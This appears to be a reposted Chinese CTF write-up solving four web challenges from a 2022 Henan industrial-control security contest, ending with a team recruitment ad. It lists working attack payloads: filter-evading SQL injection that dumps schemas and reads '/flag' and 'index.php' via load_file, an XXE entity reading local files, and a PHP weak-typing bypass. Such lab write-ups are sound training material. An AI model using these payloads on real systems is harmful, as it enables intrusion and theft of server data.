2022IS河南工业控制安全部分web题解

WriteUp 3周前 admin
55 0 0

本文来自权信安网络安全生态圈  

作者:天权信安网络安全团队


2022IS河南工业控制安全部分web题解Headlight

HNGK-兰亭集序

01

web兰亭集序


进入靶机,直接跳转到这个URL页面,有file参数请求,猜测是ssrf

2022IS河南工业控制安全部分web题解


F12查看源码,发现提示,

2022IS河南工业控制安全部分web题解


尝试在URL里修改提示的flag文件,

2022IS河南工业控制安全部分web题解


啥都没有,F12看下源码,发现flag

2022IS河南工业控制安全部分web题解

02

HNGK-out


提示是一个sql注入

2022IS河南工业控制安全部分web题解



进入后发现提示输入一个id参数,尝试用get传参,发现回显,

2022IS河南工业控制安全部分web题解


输入id=1',判断闭合符号,

2022IS河南工业控制安全部分web题解


报错,输入id=1'%23

2022IS河南工业控制安全部分web题解


恢复正常,说明闭合符号是'

然后先判断下表格的列数是多少,输入id=1'order by 1%23,

2022IS河南工业控制安全部分web题解


发现报错,查看报错信息,发现报错的是 derby1 ,说明字母o还有空格被过滤掉了,用/**/代替空格,用Order代替order,提交,


2022IS河南工业控制安全部分web题解


发现还报错,但是报错信息改变了,没有or,猜想是or不能连用,于是继续改变order为O rder,提交,

2022IS河南工业控制安全部分web题解


终于正常了。

然后判断列数为3,

2022IS河南工业控制安全部分web题解
2022IS河南工业控制安全部分web题解


联合查询数据库,?id=1'union/**/select/**/1,2,database()%23

报错,发现是select被过滤了,

2022IS河南工业控制安全部分web题解


尝试双写绕过,?id=1'union/**/seselectlect/**/1,2,database()%23

2022IS河南工业控制安全部分web题解



成功!

接下来使用下列命令查询数据库中的数据,

1,查询数据库

?id=-1'union/**/seselectlect/**/1,2,group_concat(schema_name)/**/from/**/infO rmation_schema.schemata%23

注意:or之间要加个空格,否则会被过滤

2022IS河南工业控制安全部分web题解


2,查表名

?id=-1'union/**/seselectlect/**/1,2,group_concat(table_name)/**/from/**/infO rmation_schema.tables/**/where/**/table_schema='security'%23

2022IS河南工业控制安全部分web题解


3,查字段

?id=-1'union/**/seselectlect/**/1,2,group_concat(column_name)/**/from/**/infO rmation_schema.columns/**/where/**/table_name='emails'%23

2022IS河南工业控制安全部分web题解


4,查数据值,

?id=-1'union/**/seselectlect/**/1,2,group_concat(id,email_id)/**/from/**/security.emails%23

2022IS河南工业控制安全部分web题解



按照上述方法将security中所有数据看一遍,发现没有flag.............

猜想是非预期,于是提交,

?id=-1'unioN/**/sselectelect/**/1,load_file("/var/www/html/index.php"),3/**/%23

2022IS河南工业控制安全部分web题解



证明是非预期,最终在根目录下发现flag,

?id=-1'unioN/**/sselectelect/**/1,load_file("/flag"),3/**/%23

2022IS河南工业控制安全部分web题解

03

HNGK-xxx


2022IS河南工业控制安全部分web题解


尝试了几下以为是sql注入,结果登录点不动,sql注入尝试失败,继续点开源代码查看

2022IS河南工业控制安全部分web题解



经典xxe,我直接向doLogin.php

发包,利用经典协议流


<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE any [

<!ENTITY xxe SYSTEM "file:///flag" >]>

<user><username>&xxe;</username><password>111</password></user>

在包里填充发送,flag一把哈出来了

2022IS河南工业控制安全部分web题解

04

HNGK-phpgame


2022IS河南工业控制安全部分web题解


乱码,直接修正乱码

2022IS河南工业控制安全部分web题解



提示php66.php

2022IS河南工业控制安全部分web题解



一眼丁真代码审计

首先就是先知道json传参的形式


2022IS河南工业控制安全部分web题解


2022IS河南工业控制安全部分web题解



接下来开始绕过函数分析

year":"2022a"绕过$info["year"]=2022)

"items":[]绕过is_array(@$info["items"])

"items":["0",["a"],"g"] 绕过 !is_array($info["items"][1])OR count($info["items"])!==3

0绕过array_search("game", $info["items"]),用到了PHP弱类型的一个特性,当一个整形和一个其他类型行比较的时候,会先把其他类型intval再比较。

最后构建payload:

?get={"year":"2022a","items":[0,["a"],"g"]}



2022IS河南工业控制安全部分web题解






招新小广告














2023年招新计划(主力/NMEGREZ)


注:不限年龄与职业要求,只要不是纯小白(或者是初学者未参与过任何一场比赛的人)就有机会通过审核,天权信安对外长期招新,出色的师傅能够参与团队项目和竞赛项目建设。


PWN:要求技术中等偏上曾参与过省级/国家级网安赛事荣获过奖项的师傅优先考虑)

REVERSE:要求技术中等(曾参与过省级/国家级网安赛事荣获过奖项的师傅优先考虑)

CRYPTO:要求技术中等偏上

WEB:要求技术中等偏上

取证:曾参与过省级网安取证赛事荣获过奖项的师傅

BLOCKCHAIN/IOT/工控/AI:要求技术中等


CTF竞赛靶场/TQCTF练习平台运维师傅:若干名,熟悉docker操作、动态题目部署、以及常规运维,还具备组网部署经验和Linux、Windows系统部署和日常维护,能使靶场平台在各种环境中正常运行。


 欢迎联系

投递邮箱:megrez@megrezsec.cn(Evan师傅)






--

 

2022IS河南工业控制安全部分web题解
2022,感恩有您
2023,携手同行

 用技术撬动未来,用奋斗描绘成功!


     

     天CTF资深专业人士前来分享沿IOTCTFCTFer聚集了一群热爱网络安全的有志之士的加入,

2022IS河南工业控制安全部分web题解


位大咖加入我们


往期回顾:

NepnepxCATCTF-CatPaw视频详解

NepnepxCATCTF-CatPaw题目详解

NepnepxCATCTF部分WriteUp

原文始发于微信公众号(天权信安):2022IS河南工业控制安全部分web题解

版权声明:admin 发表于 2023年1月6日 上午9:01。
转载请注明:2022IS河南工业控制安全部分web题解 | CTF导航

相关文章

暂无评论

暂无评论...